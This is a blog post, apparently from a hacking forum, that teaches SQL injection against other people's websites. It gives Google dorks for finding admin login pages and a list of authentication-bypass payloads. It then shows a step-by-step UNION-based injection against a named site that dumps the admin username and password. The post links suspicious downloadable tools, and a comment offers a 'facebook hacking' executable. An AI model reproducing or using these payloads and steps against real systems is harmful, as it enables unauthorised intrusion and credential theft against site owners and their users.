3:48 PM
Avais,Haseeb
Introduction:
Hello every one .
I am going to share with one of the best of my tutorials here .
Now Let's begin!!
Sql injection (aka Sql Injection or Structured Query Language Injection) is the first step in the entry to exploiting or hacking websites. It is easily done and it is a great starting off point. Unfortunately most sqli tutorials suck, so that is why I am writing this one. Sqli is just basically injecting queries into a database or using queries to get authorization bypass as an admin.
Things you should know :
Data is in the columns and the columns are in tables and the tables are in the database .
Just remember that so you understand the rest .
PART 1
Bypassing admin log in
Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:
Code:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"the site should look something like this :
ADMIN USERNAME :
PASSWORD :
so what we do here is in the username we always type "Admin"
and for our password we type our sql injection
here is a list of sql injections
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'username:Admin
password:'or'1'='1
that will confuse the site and give you authorisation to enter as admin
If the site is vulnerable than you are in :D
PART 2
Finding Sites to Inject
Finding SQLI Vulnerable sits is extremely easy all you need to do is some googling. The first thing you need to do are find some dorks.
Download SQLI dorks list from here : http://www.mediafire.com/?y7v30lcj0kn8836
http://adf.ly/cjpJ <--- password is somewhere in it
PS:I didn't put them in the thread because i passed count limit...
Pick one of those dorks and add inurl: before it (If they do not already have it) and then copy and paste it into google. Pick one of the sites off google and go to it.
For example the url of the page you are on may look like this :
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10
To check that it is vulnerable all you have to do is add a '
So our link should look like that :
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=10'Press enter and you get some kind of error. The errors will vary...
Our page should look like that : (Click to View)
Our link should look like that :
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 15--If you get an error that means you should lower the number of columns .
Let's try 10.
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 10--The page opened normally that means the number of columns is between 10 and 14.
We try now 11.
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 11--The page opened normally too...
Let's try 12.
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 12--We got error . That means the columns number is 11 because we got error on 12 and 11 opened normally .
Finding Accessible Columns
Now that we have the number of columns we need to get the column numbers that we can grab information from.
We can do that by adding a "-" before the "10" replacing the " order by # " with "union all select " and columns number
Our link should look like that :
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11--We should get numbers .
Our page should look like that : (Click to View)
For the end part of the url, (1,2,3,4,5,6,7,8,9,10,11) You put the number of columns you found in the first step. Since I found that the site I was testing had 11 columns, I put 1,2,3,4,5,6,7,8,9,10,11--
These numbers are the colum numbers we can get information from. We will replace them later with something else so write them down if you want.
Getting Database Version
We found that column 8 , 3 , 4 and 5 are vulnerable so we will use them to get the database version .
Why Do We Do That?
If database is under 5 that means we will have to guess the tables names
To do that we need to replace one of the vulnerable columns by "@@verion"
Let's take column 8.
Our link should look like that :
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--
The page should look like that : (Click to View)
In our case we got "5.0.77" its >5 so we can continue.
Now we need to get the table name we want to access :
To do it we need to replace "@@version" with "table_name" and add after the last columns number "from information_schema.tables" and add the "--" in the end .
Link should be like that:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--
Page should look like that : (Click to View)
Now we will search the table we want to access .
We should fine something with admin on it and in our case it's tbladmin
Spoiler (Click to View)
Now we need to get the ASCII value of "tbladmin".
What is ASCII?
http://en.wikipedia.org/wiki/ASCII_value
Now to get the ASCII value of "tbladmin" go to that site : http://getyourwebsitehere.com/jswb/text_to_ascii.html
Spoiler (Click to View)
Now enter in first box the table name wich is "tbladmin" in our case and click convert to ASCII.
You will get as value that :
Code:
tbladminIt should be like that:
Code:
116,98,108,97,100,109,105,110Spoiler (Click to View)
Now we replace in the URL the "table_name" to "column_name" and change "information_schema.tables" to "information_schema.columns and add "where table_name=char(ASCII value)--
in our case at place of (ASCII value) we put (116,98,108,97,100,109,105,110)--
Our URL should look like that :
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--Our page should be like that:
Spoiler (Click to View)
Now we search for the columns named "username" and "password" or something like that .
In our case it is "username" and "password".
Now we can delete most of the URL .
Remove everything after the 11 and add : "from tbladmin" And replace "column_name" with "concat(username,0x3a,password)
0x3a is the ASCII value of a : so we can separate the username from the password.
Our URL should look like that:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladminOur page should look like that :
Spoiler (Click to View)
And you're done the username is ishir and password ishir123
Some times password is encrypted with Hashes .
Use my HASH detector to know what it is and decrypt online.
http://www.mediafire.com/?7qd7t6r3b13ccq4
http://adf.ly/cjpJ<---- the password is in it somewhere :)
And We're Done !
I hope you liked my tutorial .
ALL credits go to me !
Thanks for reading that thread.
Posted in: SQL injection
26 comments:
Amazing! I did not read such a good tutorial first
Thanks alot
I think wordpress is the best blogging platform available. I liked the design of your blog. Great going mate!
-Kelly
fat loss 4 idiots
Good stuff, but when trying to acces via FTP with the user pw, it doesn't accept them...
Thanks for such nice comments
but how I'm going to find the admin panel????????
636f6c6c6174696f6e i got this after converting the text now what to do m confused.......
awe
http://www.mediafire.com/?y7v30lcj0kn8836
this file password....???
i have facebook hacking tool for awesome facebook hacking install and enter facebook email id then enter randome generated password for 5 times after that victem facebook account is open
enjoy for hacking
https://hotfile.com/dl/163409838/03ddd2f/facebook.exe.html
Thanks for all the information, it was very helpful i really like that you are providing information on PHP and MYSQL with basic JAVASCRIPT,being enrolled in http://www.wiziq.com/course/5871-php-mysql-with-basic-javascript-integrated-course i was looking for such information online to assist me on php and mysql and your information helped me a lot. Thanks.
Hello, i would like to ask that what is the benefits of sql training, what all topics should be covered and it is kinda bothering me … and has anyone studies from this course http://www.wiziq.com/course/125-comprehensive-introduction-to-sql of SQL tutorial online?? or tell me any other guidance...
would really appreciate help… and Also i would like to thank for all the information you are providing on sql training.
View the Net Worth of Celebrities, Athletes, Rappers and other Famous Movie Stars. World's Most Comprehensive Celebrity Net Worth Encyclopedia
celebrity net worth
celebrities net worth
John Saladino's own apartment together with his slipcovered living area chairs with tie detailing as part of his favorite color quick loans you are able to use your cheap loan money to refurbish your own home or smarten-the kitchen and garden.
AppGenerate was created by a group of iOS, Android, and HTML5 developers who decided it was time for anyone to be able to build their own mobile apps. We believe the mobile revolution is here. In 2011, retailers like Amazon received more traffic from mobile devices than they did desktop and laptop computers. Just imagine that it's not just a big slice of traffic, it's more than 50%. Just like the dawn of the Internet revolution, if your business doesn't have a presence in mobile, you'll be left behind, or worse, you won't even exist.
app maker
app builder
mobile app builder software free
mobile app maker software
mobile app maker online
generate app
Hey there! Quick question that's totally off topic. Do you know how to make your site mobile friendly? My site looks weird when browsing from my iphone 4. I'm trying to
find a theme or plugin that might be able to correct this issue.
If you have any suggestions, please share. Appreciate it!
Also visit my site ロレックスレプリカ
This website really has all the information and facts I needed about
this subject and didn't know who to ask.
Here is my web site ... ロレックスコピー
Your method of explaining the whole thing in this paragraph is
actually pleasant, all be capable of without difficulty understand it,
Thanks a lot.
My blog post - http://www.hiarabs.com/blog/32868/that-to-calculate-points-for-weight-viewers-pointsplus
The health hazards of ΕМF's have been known cell phone for years, have bееn utilizing keypads for input.
my blog :: ifourlocal.co.uk
Somе typeѕ оf unlocked phοne have two CPU ѕ central pгоcessing units, ruled agaіnst hіm, and
cell phone that the wаггantless ѕearсh wаѕ valіd.
My web site; dien thoai
Excellent goods from you, man. I've understand your stuff previous to and you're just too magnificent.
I really like what you've acquired here, really like what you're saying
and the way in which you say it. You make it enjoyable and you still care for to keep it wise.
I cant wait to read far more from you. This is actually a tremendous site.
Feel free to visit my web blog winrar unlocker
Cool blog! Is your theme custom made or did you download it from somewhere?
A theme like yours with a few simple tweeks would really make my blog jump out.
Please let me know where you got your design.
Thanks a lot
Here is my web page ... book of raw online spielen
Remarkable! Its in fact awesome piece of writing,
I have got much clear idea regarding from this post.
Feel free to visit my web-site ... sharecash surveys
I am curious to find out what blog system you happen to be using?
I'm having some small security issues with my latest site and I'd
like to find something more secure. Do you
have any recommendations?
Here is my web page - www.monsterbeatsphones-vip.com
It's a shame you don't have a donate button! I'd without a doubt donate to this excellent blog! I guess for now i'll settle for book-marking and adding your RSS feed to my Google account.
I look forward to new updates and will talk about this site with my Facebook group.
Talk soon!
my web site :: monster ヘッドホン
I am really enjoying the theme/design of your weblog.
Do you ever run into any browser compatibility issues?
A handful of my blog visitors have complained about my site
not operating correctly in Explorer but looks great in Opera.
Do you have any recommendations to help fix this issue?
Look at my site - http://www.oakleyoutlet-sale.com
Excellent goods from you, man. I've understand your stuff previous to and you're just too
fantastic. I really like what you have acquired here, really like
what you are stating and the way in which you say it.
You make it entertaining and you still take care of
to keep it smart. I can not wait to read much more from you.
This is actually a terrific website.
my web site; ロレックスレプリカ
Post a Comment
You can Ask anything that you like!!!!